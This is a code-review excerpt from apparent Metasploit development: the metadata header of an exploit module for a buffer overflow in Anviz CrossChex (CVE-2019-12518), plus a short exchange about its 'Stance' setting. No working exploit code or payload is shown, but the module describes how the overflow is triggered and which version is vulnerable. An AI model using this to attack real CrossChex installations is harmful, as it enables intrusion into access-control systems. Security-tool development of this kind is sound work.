modules/exploits/windows/misc/crosschex_device_bof.rb

```diff
@@ -0,0 +1,81 @@
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+  PAYLOAD_MAX_LENGTH = 8947
+  PACKET_LEN = 10
+
+  include Msf::Exploit::Remote::Udp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Anviz CrossChex Local Buffer Overflow',
+      'Description'	=> %q{
+        Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,
+        triggering buffer overflow.
+      },
+      'Author'	  	=>
+        [
+            'Luis Catarino <lcatarino@protonmail.com>',  # original discovery/exploit
+            'Pedro Rodrigues <pedrosousarodrigues@protonmail.com>',   # original discovery/exploit
+            'agalway-r7',  # Module creation
+            'adfoster-r7' # Module creation
+        ],
+      'License'		  => MSF_LICENSE,
+      'References'	=>
+        [
+            ['CVE', "2019-12518"],
+            ['URL', "https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html"],
+            ['EDB', "47734"]
+        ],
+      'DefaultOptions' =>
+        {
+            'TIMEOUT' => 100,
+            'EncoderType' => Msf::Encoder::Type::Raw,
+            'CHOST' => "0.0.0.0",
+            'CPORT' => 5050
+        },
+      'Privileged'	=> true,
+      'Platform' => 'win',
+      'DisclosureDate' => 'Nov 28, 2019',
+      'Targets'        =>
+          [
+            [
+              'Crosschex Standard x86 <= V4.3.12',
+              {}
+            ]
+          ],
+      'DefaultTarget'  => 0,
+      'Stance' => Msf::Exploit::Stance::Aggressive
```

Comment:
I don't see anything requiring this, but I may not have looked close enough.

Reply:
`Agressive` is set implicitly if stance is left absent so it isn't necessary, the above was left in in anticipation of the module being changed back to passive once we got a fix. Having read through your big thread on slack though I think that if the user doesn't care that it isn't in passive mode then we shouldn't either.